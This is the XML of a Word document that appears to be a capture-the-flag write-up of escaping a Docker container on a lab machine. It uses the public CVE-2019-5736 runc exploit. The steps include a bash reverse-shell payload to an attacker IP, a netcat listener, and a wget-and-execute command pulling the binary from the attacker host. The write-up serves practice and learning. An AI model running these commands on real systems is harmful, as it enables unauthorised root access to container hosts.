      </w:r>
      <w:r w:rsidRPr="00C26F3D">
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26F3D" w:rsidRDefault="000F6CDF" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="324B6EC3" wp14:editId="77F52818">
            <wp:extent cx="3409950" cy="571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DF" w:rsidRDefault="000F6CDF" w:rsidP="001040DF"/>
    <w:p w:rsidR="000F6CDF" w:rsidRDefault="00420C79" w:rsidP="001040DF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00420C79">
        <w:t>noah@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00420C79">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00420C79">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00420C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00420C79">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00420C79">
        <w:t xml:space="preserve"> exec -it webapp-dev01 bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00420C79" w:rsidRDefault="00420C79" w:rsidP="001040DF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D619E1" wp14:editId="5CA35099">
            <wp:extent cx="4533900" cy="342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79" w:rsidRDefault="00420C79" w:rsidP="001040DF"/>
    <w:p w:rsidR="000C0BE3" w:rsidRDefault="000C0BE3" w:rsidP="000C0BE3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420C79" w:rsidRDefault="000C0BE3" w:rsidP="000C0BE3">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="000F5055">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000C0BE3" w:rsidRDefault="000123A0" w:rsidP="000C0BE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="585BF46E" wp14:editId="47768CBC">
            <wp:extent cx="5943600" cy="141783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5156" cy="142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A0" w:rsidRDefault="000123A0" w:rsidP="000C0BE3"/>
    <w:p w:rsidR="000123A0" w:rsidRDefault="001B1673" w:rsidP="000C0BE3">
      <w:r>
        <w:t>Now add and edit this line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1673" w:rsidRDefault="001B1673" w:rsidP="000C0BE3">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B1673">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B1673">
        <w:t xml:space="preserve"> payload = "#!/bin/bash \n bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B1673">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B1673">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B1673">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B1673">
        <w:t>/10.10.14.130/9999 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1673" w:rsidRDefault="00CA6399" w:rsidP="000C0BE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B3C38AB" wp14:editId="4BDD9C85">
            <wp:extent cx="5943600" cy="1704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99" w:rsidRDefault="00CA6399" w:rsidP="000C0BE3"/>
    <w:p w:rsidR="00550AD6" w:rsidRDefault="00550AD6" w:rsidP="00550AD6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CA6399" w:rsidRDefault="00550AD6" w:rsidP="00550AD6">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550AD6" w:rsidRDefault="00A54F44" w:rsidP="00550AD6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3421C638" wp14:editId="2F6187E1">
            <wp:extent cx="3257550" cy="5905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44" w:rsidRDefault="00A54F44" w:rsidP="00550AD6"/>
    <w:p w:rsidR="008213CE" w:rsidRDefault="008213CE" w:rsidP="008213CE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A54F44" w:rsidRDefault="008213CE" w:rsidP="008213CE">
      <w:r>
        <w:t xml:space="preserve">└─# go build </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>main.go</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A81C2E" w:rsidRDefault="00055703" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30556DEB" wp14:editId="459DEB32">
            <wp:extent cx="3000375" cy="4476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03" w:rsidRDefault="00055703" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00055703" w:rsidRDefault="00055703" w:rsidP="00E841E0">
      <w:r w:rsidRPr="00055703">
        <w:t>root@8a8cdc77ff6e:/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055703">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055703">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055703">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055703">
        <w:t xml:space="preserve"> http://10.10.14.130:8081/main &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055703">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055703">
        <w:t xml:space="preserve"> +x main &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00055703">
        <w:t>&amp; ./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00055703">
        <w:t>main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055703" w:rsidRDefault="00540A50" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BE46E8C" wp14:editId="116B5BA5">
            <wp:extent cx="5943600" cy="2188396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67649" cy="219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50" w:rsidRDefault="00540A50" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00A81CEE" w:rsidRDefault="00A81CEE" w:rsidP="00E841E0">
      <w:r>
        <w:t xml:space="preserve">Now open another session </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81CEE" w:rsidRDefault="009570E7" w:rsidP="00E841E0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009570E7">
        <w:t>noah@thenotebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009570E7">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009570E7">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009570E7">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009570E7">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009570E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009570E7">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009570E7">
        <w:t xml:space="preserve"> exec -it webapp-dev01 /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009570E7">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009570E7" w:rsidRDefault="009C0222" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F55F47" wp14:editId="1EC5CED5">
            <wp:extent cx="5181600" cy="561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22" w:rsidRDefault="009C0222" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00EB1C1E" w:rsidRDefault="00EB1C1E" w:rsidP="00E841E0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E00049D" wp14:editId="72985BC0">
            <wp:extent cx="5943600" cy="18014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1E" w:rsidRDefault="00EB1C1E" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00EB1C1E" w:rsidRDefault="00EB1C1E" w:rsidP="00E841E0">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C716ED" w:rsidRDefault="00C716ED" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00C716ED" w:rsidRDefault="00C716ED" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00311D21" w:rsidRDefault="00311D21" w:rsidP="00E841E0"/>
    <w:p w:rsidR="00703E58" w:rsidRDefault="00703E58" w:rsidP="00C87BD4"/>
    <w:p w:rsidR="005455D3" w:rsidRDefault="005455D3" w:rsidP="00C87BD4"/>
    <w:sectPr w:rsidR="005455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6BA"/>
    <w:rsid w:val="000123A0"/>
    <w:rsid w:val="000310D8"/>
    <w:rsid w:val="0004055C"/>
    <w:rsid w:val="00045E70"/>
    <w:rsid w:val="00055703"/>
    <w:rsid w:val="00077E9F"/>
    <w:rsid w:val="000C0BE3"/>
    <w:rsid w:val="000F6CDF"/>
    <w:rsid w:val="001040DF"/>
    <w:rsid w:val="001836BC"/>
    <w:rsid w:val="001B1673"/>
    <w:rsid w:val="001F7BDB"/>
    <w:rsid w:val="00204341"/>
    <w:rsid w:val="0022225E"/>
    <w:rsid w:val="00243182"/>
    <w:rsid w:val="00246BF9"/>
    <w:rsid w:val="002C5430"/>
    <w:rsid w:val="002E2C21"/>
    <w:rsid w:val="002E5207"/>
    <w:rsid w:val="00311D21"/>
    <w:rsid w:val="00376A94"/>
    <w:rsid w:val="003A256D"/>
    <w:rsid w:val="003D3D4E"/>
    <w:rsid w:val="003E4604"/>
    <w:rsid w:val="00401B3E"/>
    <w:rsid w:val="00415E0C"/>
    <w:rsid w:val="00420C79"/>
    <w:rsid w:val="00452D75"/>
    <w:rsid w:val="004600D7"/>
    <w:rsid w:val="0048261A"/>
    <w:rsid w:val="00517DDD"/>
    <w:rsid w:val="0052562C"/>
    <w:rsid w:val="00540A50"/>
    <w:rsid w:val="005444C6"/>
    <w:rsid w:val="005455D3"/>
    <w:rsid w:val="00550AD6"/>
    <w:rsid w:val="005714AF"/>
    <w:rsid w:val="005D076D"/>
    <w:rsid w:val="00633C4F"/>
    <w:rsid w:val="006F164E"/>
    <w:rsid w:val="00703E58"/>
    <w:rsid w:val="00712FC3"/>
    <w:rsid w:val="00726F6D"/>
    <w:rsid w:val="007978D0"/>
    <w:rsid w:val="007D70C2"/>
    <w:rsid w:val="007F56FA"/>
    <w:rsid w:val="007F76BA"/>
    <w:rsid w:val="00803124"/>
    <w:rsid w:val="0081065E"/>
    <w:rsid w:val="008213CE"/>
    <w:rsid w:val="008B1DAE"/>
    <w:rsid w:val="008E1E45"/>
    <w:rsid w:val="008F252B"/>
    <w:rsid w:val="009570E7"/>
    <w:rsid w:val="009C0222"/>
    <w:rsid w:val="00A23D54"/>
    <w:rsid w:val="00A54F44"/>
    <w:rsid w:val="00A658A1"/>
    <w:rsid w:val="00A81C2E"/>
    <w:rsid w:val="00A81CEE"/>
    <w:rsid w:val="00AC04C3"/>
    <w:rsid w:val="00AD7F36"/>
    <w:rsid w:val="00AE5BB6"/>
    <w:rsid w:val="00AF7F6A"/>
    <w:rsid w:val="00B322A3"/>
    <w:rsid w:val="00B87F2E"/>
    <w:rsid w:val="00BB2506"/>
    <w:rsid w:val="00BF5785"/>
    <w:rsid w:val="00C26F3D"/>
    <w:rsid w:val="00C716ED"/>
    <w:rsid w:val="00C87BD4"/>
    <w:rsid w:val="00CA6399"/>
    <w:rsid w:val="00CC3656"/>
    <w:rsid w:val="00D6787F"/>
    <w:rsid w:val="00DB7923"/>
    <w:rsid w:val="00DE2033"/>
    <w:rsid w:val="00E841E0"/>
    <w:rsid w:val="00EB1C1E"/>
    <w:rsid w:val="00EB5223"/>
    <w:rsid w:val="00EC4550"/>
    <w:rsid w:val="00ED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F2586"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7D438AE8-0B6C-4E02-AC93-806B6C868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36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hyperlink" Target="http://10.10.10.230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hyperlink" Target="https://jwt.io/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home.tar.gz" TargetMode="External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hyperlink" Target="https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go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15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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-29T10:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-29T14:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>